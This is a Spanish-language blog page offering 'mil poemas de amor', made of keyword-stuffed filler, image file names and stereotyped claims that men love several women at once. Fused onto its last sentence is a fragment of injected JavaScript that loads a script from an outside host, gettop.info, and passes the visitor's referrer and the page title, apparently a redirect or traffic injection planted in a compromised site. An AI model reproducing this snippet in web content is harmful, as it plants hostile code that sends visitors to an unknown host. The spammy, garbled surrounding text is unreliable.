Mil Poemas De Amor Originales Para El Amor

Quiero enpezar el día de hoy con una frase muy peculiar. “Nunca miras lo  ajeno, que para cada hombre, hay una mujer, para cada mujer hay un hombre y si lo haces, sabiendo estos datos, la que sufrirás eres TÚ.”

No permitas que tu corazón sufra por alguien ajeno. Amiga o amigo del alma, aquí te ofrezco mil poemas de amor, para enamorara tu chico o chica ideal.

mil-poemas-de-amor-cortos

Esta imagen la que observas, envíala sin dudar a esa persona que significa mucho para ti. Solo aquí escoge mil poemas de amor originales, para tu único amor

mil-poemas-de-amor-y-una-cancion-desesperada-pdf

Los abrazos de la persona que queremos, son únicos y nos dan calor de amor. Eso hace que cada día se fortaleza nuestra  relación de pareja.

mil-poemas-de-amor-y-una-cancion-desesperada
Si fallaste, es de un verdadero caballero pedir perdón a la persona que amas. Conquistale con mil poemas de amor y una cancion desesperada pdf

mil-poemas-de-amor

El sentimiento de una persona es incomparable,en especial  de una mujer. Cuando una dama ama, se enamora de una sola persona, pero sin embargo el hombre quiere ala vez a 2 o 3 mujer y eso no es amor, solo una ilusion pasajera.

Bueno eso hacen solo hasta que llega, como se dice la elegida, es de ella que se enamora tanto, que daría su vida por ella.

Si eso es tu caso escoge unas bonitas palabras de estas mil poemas de amor cortos, para dedicarle.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *